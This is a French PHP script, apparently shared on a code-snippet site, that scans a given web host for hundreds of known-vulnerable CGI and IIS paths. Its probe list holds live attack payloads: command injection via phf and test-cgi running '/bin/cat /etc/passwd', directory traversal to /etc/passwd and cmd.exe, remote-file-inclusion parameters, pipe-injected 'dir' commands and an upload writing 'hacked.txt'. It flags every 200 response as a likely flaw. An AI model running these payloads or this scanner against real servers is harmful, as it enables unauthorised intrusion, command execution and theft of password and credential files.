SCANER DE FAILLES CGI (SOCKET)

<?PHP

echo "Variables :<BR>host = adresse du site<BR>path = Répertoire des script CGI (ex : /cgi-bin/)<BR>";
echo "<BR><B>King 2002</B><BR><BR>";
$cgi[] = "test-cgi?\help&0a/bin/cat%20/etc/passwd";
$cgi[] = "test-cgi?";
$cgi[] = "nph-test-cgi?";
$cgi[] = "nph-test-cgi?x";
$cgi[] = "php.cgi?/etc/passwd";
$cgi[] = "../cool-logs/mlog.html?screen=/etc/passwd";
$cgi[] = "phf?Qalias=x%0a/bin/cat%20/etc/passwd";
$cgi[] = "../index.php?url=http://www.google.com";
$cgi[] = "../index.php3?url=http://www.google.com";
$cgi[] = "../index2.php?url=http://www.google.com";
$cgi[] = "../index2.php3?url=http://www.google.com";
$cgi[] = "../main.php?url=http://www.google.com";
$cgi[] = "../main.php3?url=http://www.google.com";
$cgi[] = "../default.php?url=http://www.google.com";
$cgi[] = "../default.php3?url=http://www.google.com";
$cgi[] = "../start.php3?url=http://www.google.com";
$cgi[] = "../start.php3?url=http://www.google.com";
$cgi[] = "../index.php?file=http://www.google.com";
$cgi[] = "../index.php3?file=http://www.google.com";
$cgi[] = "../index2.php?file=http://www.google.com";
$cgi[] = "../index2.php3?file=http://www.google.com";
$cgi[] = "../main.php?file=http://www.google.com";
$cgi[] = "../main.php3?file=http://www.google.com";
$cgi[] = "../default.php?file=http://www.google.com";
$cgi[] = "../default.php3?file=http://www.google.com";
$cgi[] = "../start.php3?file=http://www.google.com";
$cgi[] = "../start.php3?file=http://www.google.com";
$cgi[] = "../index.php?page=http://www.google.com";
$cgi[] = "../index.php3?page=http://www.google.com";
$cgi[] = "../index2.php?page=http://www.google.com";
$cgi[] = "../index2.php3?page=http://www.google.com";
$cgi[] = "../main.php?page=http://www.google.com";
$cgi[] = "../main.php3?page=http://www.google.com";
$cgi[] = "../default.php?page=http://www.google.com";
$cgi[] = "../default.php3?page=http://www.google.com";
$cgi[] = "../start.php3?page=http://www.google.com";
$cgi[] = "../start.php3?page=http://www.google.com";
$cgi[] = "../index.php?action=http://www.google.com";
$cgi[] = "../index.php3?action=http://www.google.com";
$cgi[] = "../index2.php?action=http://www.google.com";
$cgi[] = "../index2.php3?action=http://www.google.com";
$cgi[] = "../main.php?action=http://www.google.com";
$cgi[] = "../main.php3?action=http://www.google.com";
$cgi[] = "../default.php?action=http://www.google.com";
$cgi[] = "../default.php3?action=http://www.google.com";
$cgi[] = "../start.php3?action=http://www.google.com";
$cgi[] = "../start.php3?action=http://www.google.com";
$cgi[] = "../scripts/tools/newdsn.exe=";
$cgi[] = "../scripts/tools/dsnform.exe";
$cgi[] = "../scripts/tools/getdrvrs.exe";
$cgi[] = "../scripts/tools/mkilog.exe";
$cgi[] = "../null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full";
$cgi[] = "../_vti_bin/shtml.dll";
$cgi[] = "../_vti_bin/shtml.dll/nosuch.htm";
$cgi[] = "../?PageServices";
$cgi[] = "../admin";
$cgi[] = "../administration";
$cgi[] = "../index.php%00";
$cgi[] = "../index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc";
$cgi[] = "../index.php?page=../../../../../../../../../../etc/passwd";
$cgi[] = "../index.php?sql_debug=1";
$cgi[] = "imagemap";
$cgi[] = "../whisker.htw";
$cgi[] = "../admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt";
$cgi[] = "../?Open";
$cgi[] = "../?open";
$cgi[] = "../search/s97_cgi.exe";
$cgi[] = "../scripts/counter.exe";
$cgi[] = "../passwords.php";
$cgi[] = "../pass";
$cgi[] = "../cfide/administrator/index.cfm";
$cgi[] = "..htimage.exe";
$cgi[] = "..htimage.exe?2,2";
$cgi[] = "..imagemap.exe";
$cgi[] = "../_private/form_results.txt";
$cgi[] = "../usr/local/apache/share/htdocs/.htaccess";
$cgi[] = "../usr/local/apache/share/htdocs/.htaccess";
$cgi[] = "../scripts/../../cmd.exe";
$cgi[] = "../....../autoexec.bat";
$cgi[] = "../.htaccess";
$cgi[] = "../.html/............/autoexec.bat";
$cgi[] = "../.htpasswd";
$cgi[] = "../_AuthChangeUrl";
$cgi[] = "../_AuthChangeUrl";
$cgi[] = "../_private/form_results.txt";
$cgi[] = "../_private/orders.txt";
$cgi[] = "../_private/register.txt";
$cgi[] = "../_private/registrations.txt";
$cgi[] = "../_vti_inf.html";
$cgi[] = "../_vti_pvt/administrator.pwd";
$cgi[] = "../_vti_pvt/administrators.pwd";
$cgi[] = "../_vti_pvt/author.log";
$cgi[] = "../_vti_pvt/authors.pwd";
$cgi[] = "../_vti_pvt/service.grp";
$cgi[] = "../_vti_pvt/service.pwd";
$cgi[] = "../_vti_pvt/users.pwd";
$cgi[] = "../admisapi/fpadmin.htm";
$cgi[] = "../adsamples/config/site.csc";
$cgi[] = "../AdvWorks/equipment/catalog_type.asp";
$cgi[] = "../ASPSamp/AdvWorks/equipment/catalog_type.asp";
$cgi[] = "../bb-dnbd/bb-hist.sh";
$cgi[] = "../carbo.dll";
$cgi[] = "../catalog.nsf";
$cgi[] = "../cfappman/index.cfm";
$cgi[] = "../cfappman/index.cfm";
$cgi[] = "../cfdocs/cfmlsyntaxcheck.cfm";
$cgi[] = "../cfdocs/cfmlsyntaxcheck.cfm";
$cgi[] = "../cfdocs/exampleapp/docs/sourcewindow.cfm";
$cgi[] = "../cfdocs/exampleapp/email/getfile.cfm";
$cgi[] = "../cfdocs/examples/cvbeans/beaninfo.cfm";
$cgi[] = "../cfdocs/examples/httpclient/mainframeset.cfm";
$cgi[] = "../cfdocs/examples/parks/detail.cfm";
$cgi[] = "../cfdocs/expelval/displayopenedfile.cfm";
$cgi[] = "../cfdocs/expelval/exprcalc.cfm";
$cgi[] = "../cfdocs/expelval/openfile.cfm";
$cgi[] = "../cfdocs/expelval/sendmail.cfm";
$cgi[] = "../cfdocs/expeval/displayopenedfile.cfm";
$cgi[] = "../cfdocs/expeval/exprcalc.cfm";
$cgi[] = "../cfdocs/expeval/openfile.cfm";
$cgi[] = "../cfdocs/expeval/sendmail.cfm";
$cgi[] = "../cfdocs/root.cfm";
$cgi[] = "../cfdocs/snippets/evaluate.cfm";
$cgi[] = "../cfdocs/snippets/fileexists.cfm";
$cgi[] = "../cfdocs/snippets/fileexists.cfm";
$cgi[] = "../cfdocs/snippets/gettempdirectory.cfm";
$cgi[] = "../cfusion/cfapps/forums/data/forums.mdb";
$cgi[] = "../cfusion/cfapps/security/data/realm.mdb";
$cgi[] = "../cfusion/cfapps/security/realm_.mdb";
$cgi[] = "../cfusion/database/cfsnippets.mdb";
$cgi[] = "../cfusion/database/cypress.mdb";
$cgi[] = "../cfusion/database/smpolicy.mdb";
$cgi[] = "add_ftp.cgi";
$cgi[] = "aglimpse";
$cgi[] = "alibaba.pl";
$cgi[] = "gi-bin/alibaba.pl\|dir";
$cgi[] = "AnyForm";
$cgi[] = "AnyForm2";
$cgi[] = "archie";
$cgi[] = "architext_query.pl";
$cgi[] = "ash";
$cgi[] = "AT-admin.cgi";
$cgi[] = "AT-generate.cgi";
$cgi[] = "ax-admin.cgi";
$cgi[] = "axs.cgi";
$cgi[] = "bash";
$cgi[] = "bb-hist.sh";
$cgi[] = "bigconf.cgi";
$cgi[] = "bnbform";
$cgi[] = "bnbform.cgi";
$cgi[] = "cachemgr.cgi";
$cgi[] = "calendar";
$cgi[] = "campas";
$cgi[] = "carbo.dll";
$cgi[] = "cgimail.exe";
$cgi[] = "Cgitest.exe";
$cgi[] = "cgiwrap";
$cgi[] = "classified.cgi";
$cgi[] = "classifieds";
$cgi[] = "classifieds.cgi";
$cgi[] = "Count.cgi";
$cgi[] = "csh";
$cgi[] = "date";
$cgi[] = "day5datacopier.cgi";
$cgi[] = "day5notifier";
$cgi[] = "dbmlparser.exe";
$cgi[] = "download.cgi";
$cgi[] = "dumpenv.pl";
$cgi[] = "edit.pl";
$cgi[] = "environ.cgi";
$cgi[] = "excite";
$cgi[] = "faxsurvey";
$cgi[] = "faxsurvey";
$cgi[] = "filemail";
$cgi[] = "filemail.pl";
$cgi[] = "files.pl";
$cgi[] = "finger";
$cgi[] = "finger.cgi";
$cgi[] = "finger.pl";
$cgi[] = "flexform";
$cgi[] = "flexform.cgi";
$cgi[] = "FormHandler.cgi";
$cgi[] = "formmail.pl";
$cgi[] = "fortune";
$cgi[] = "fpexplorer.exe";
$cgi[] = "get32.exe\|dir";
$cgi[] = "glimpse";
$cgi[] = "guestbook.cgi";
$cgi[] = "guestbook.pl";
$cgi[] = "GW5";
$cgi[] = "GWWEB.EXE";
$cgi[] = "handler";
$cgi[] = "handler.cgi";
$cgi[] = "htmlscript";
$cgi[] = "htmlscript";
$cgi[] = "info2www";
$cgi[] = "input.bat";
$cgi[] = "input2.bat";
$cgi[] = "jj";
$cgi[] = "ksh";
$cgi[] = "lwgate";
$cgi[] = "LWGate.cgi";
$cgi[] = "lwgate.cgi";
$cgi[] = "MachineInfo";
$cgi[] = "mail";
$cgi[] = "maillist.pl";
$cgi[] = "man.sh";
$cgi[] = "mlog.phtml";
$cgi[] = "mylog.phtml";
$cgi[] = "nlog-smb.pl";
$cgi[] = "nph-error.pl";
$cgi[] = "nph-publish";
$cgi[] = "nph-test-cgi";
$cgi[] = "passwd";
$cgi[] = "passwd.txt";
$cgi[] = "password";
$cgi[] = "password.txt";
$cgi[] = "perl";
$cgi[] = "perl.exe";
$cgi[] = "perlshop.cgi";
$cgi[] = "pfdispaly.cgi";
$cgi[] = "phf";
$cgi[] = "phf.pp";
$cgi[] = "php";
$cgi[] = "php.cgi";
$cgi[] = "phpscan";
$cgi[] = "post-query";
$cgi[] = "ppdscgi.exe";
$cgi[] = "query";
$cgi[] = "redirect";
$cgi[] = "responder.cgi";
$cgi[] = "rguest.exe";
$cgi[] = "rksh";
$cgi[] = "rsh";
$cgi[] = "rwwwshell.pl";
$cgi[] = "sam._";
$cgi[] = "search.cgi";
$cgi[] = "search97.vts";
$cgi[] = "sendform.cgi";
$cgi[] = "sh";
$cgi[] = "snorkerz.bat";
$cgi[] = "snorkerz.cmd";
$cgi[] = "status.cgi";
$cgi[] = "survey";
$cgi[] = "survey.cgi";
$cgi[] = "tcsh";
$cgi[] = "test.bat";
$cgi[] = "test-cgi";
$cgi[] = "test-cgi.tcl";
$cgi[] = "test-env";
$cgi[] = "textcounter.pl";
$cgi[] = "tst.bat";
$cgi[] = "tst.bat\|dir";
$cgi[] = "unlg1.1";
$cgi[] = "upload.pl";
$cgi[] = "uptime";
$cgi[] = "view-source";
$cgi[] = "visadmin.exe";
$cgi[] = "visitor.exe";
$cgi[] = "w3-msql";
$cgi[] = "w3-sql";
$cgi[] = "w3tvars.pm";
$cgi[] = "wais.pl";
$cgi[] = "webdist.cgi";
$cgi[] = "webgais";
$cgi[] = "webmap.cgi";
$cgi[] = "websendmail";
$cgi[] = "wguest.exe";
$cgi[] = "whois_raw.cgi";
$cgi[] = "wrap";
$cgi[] = "wwwadmin.pl";
$cgi[] = "wwwboard.pl";
$cgi[] = "www-sql";
$cgi[] = "zsh";
$cgi[] = "../cgi-dos/args.bat";
$cgi[] = "../cgi-dos/args.cmd";
$cgi[] = "../cgi-shl/win-c-sample.exe";
$cgi[] = "../cgi-win/uploader.exe";
$cgi[] = "../cool-logs/mlog.html";
$cgi[] = "../cool-logs/mylog.html";
$cgi[] = "../database.nsf";
$cgi[] = "../database.nsf";
$cgi[] = "../domcfg.nsf";
$cgi[] = "../domlog.nsf";
$cgi[] = "../hosts.dat";
$cgi[] = "../iisadmpwd/achg.htr";
$cgi[] = "../IISADMPWD/achg.htr";
$cgi[] = "../iisadmpwd/aexp.htr";
$cgi[] = "../iisadmpwd/aexp2.htr";
$cgi[] = "../iisadmpwd/aexp2b.htr";
$cgi[] = "../iisadmpwd/aexp3.htr";
$cgi[] = "../iisadmpwd/aexp4.htr";
$cgi[] = "../iisadmpwd/aexp4b.htr";
$cgi[] = "../iisadmpwd/anot.htr";
$cgi[] = "../iisadmpwd/anot3.htr";
$cgi[] = "../iissamples/exair/howitworks/codebrws.asp";
$cgi[] = "../iissamples/sdk/asp/docs/codebrws.asp";
$cgi[] = "../log.nsf";
$cgi[] = "../manage/cgi/cgiproc";
$cgi[] = "../msadc/msadcs.dll";
$cgi[] = "../msadc/samples/adctest.asp";
$cgi[] = "../msadc/Samples/SELECTOR/codebrws.cfm";
$cgi[] = "../msadc/Samples/SELECTOR/showcode.asp";
$cgi[] = "../msads/samples/selector/showcode.asp";
$cgi[] = "../names.nsf";
$cgi[] = "../names.nsf";
$cgi[] = "../passwd";
$cgi[] = "../passwd.txt";
$cgi[] = "../password";
$cgi[] = "../password.txt";
$cgi[] = "../publisher/";
$cgi[] = "../samples/search/queryhit.htm";
$cgi[] = "../scripts/CGImail.exe";
$cgi[] = "../scripts/convert.bas";
$cgi[] = "../scripts/counter.exe";
$cgi[] = "../scripts/cpshost.dll";
$cgi[] = "../scripts/fpcount.exe";
$cgi[] = "../scripts/iisadmin/bdir.htr";
$cgi[] = "../scripts/iisadmin/ism.dll";
$cgi[] = "../scripts/iisadmin/tools/ctss.idc";
$cgi[] = "../scripts/iisadmin/tools/getdrvrs.exe";
$cgi[] = "../scripts/iisadmin/tools/mkilog.exe";
$cgi[] = "../scripts/issadmin/bdir.htr";
$cgi[] = "../scripts/perl";
$cgi[] = "../scripts/postinfo.asp";
$cgi[] = "../scripts/proxy/w3proxy.dll";
$cgi[] = "../scripts/samples/ctguestb.idc";
$cgi[] = "../scripts/samples/details.idc";
$cgi[] = "../scripts/samples/search/webhits.exe";
$cgi[] = "../scripts/tools/dsnform.exe";
$cgi[] = "../scripts/tools/getdrvrs.exe";
$cgi[] = "../scripts/tools/getdrvs.exe";
$cgi[] = "../scripts/tools/newdsn.exe";
$cgi[] = "../scripts/upload.asp";
$cgi[] = "../scripts/uploadn.asp";
$cgi[] = "../scripts/uploadx.asp";
$cgi[] = "../search";
$cgi[] = "../search97.vts";
$cgi[] = "../secure/.htaccess";
$cgi[] = "../secure/.wwwacl";
$cgi[] = "../session/adminlogin";
$cgi[] = "../showfile.asp";
$cgi[] = "../smdata.dat";
$cgi[] = "../ssi/envout.bat";
$cgi[] = "../today.nsf";
$cgi[] = "../tree.dat";
$cgi[] = "../WebSTAR";
$cgi[] = "../ws_ftp.ini";
$cgi[] = "../wwwboard/passwd.txt";



$cginumber = count($cgi);


if ($host) {

 for ($count = 0 ; $count < $cginumber ; $count++) {
  $fp = fsockopen($host, 80);
        if(!$fp){ echo "Impossible de se connecter a $host \n";
        break; }

    else {

    fputs($fp,"GET  $path$cgi[$count] HTTP/1.0\n\n");

         while(!feof($fp))
         {

            $nom=fgets($fp,200);

            if (ereg("200 OK",$nom))
            {
             print("<b>Faille Potentielle : $cgi[$count] </b><br>\n");
             break;
            }
             else
            {
             print("Non trouvé $cgi[$count] <br> \n");
             break;
            }
        }

  fclose($fp);

      }

 }
}

?>

• EXPÉDIER UN FORMULAIRE PAR MAIL
• TROUVER L'OS D'UN SERVEUR (SOCKET)
• ENVOYER UN MAIL EN SMTP (SOCKET)
• SCANER DE PORTS EN PHP

• WEB VIDÉO V1.0 LECTEUR VIDÉO POUR VOTRE SITE WEB
• SNMP : RECHERCHE D'ADRESSE MAC SUR UN RÉSEAU DE SWITCH
• GEO-LOCALISATION (CONTINENT)
• ENREGISTRER UNE IMAGE D'UN SITE DISTANT
• ALLUMER UNE MACHINE DANS UN RÉSEAU (WAKE ON LAN)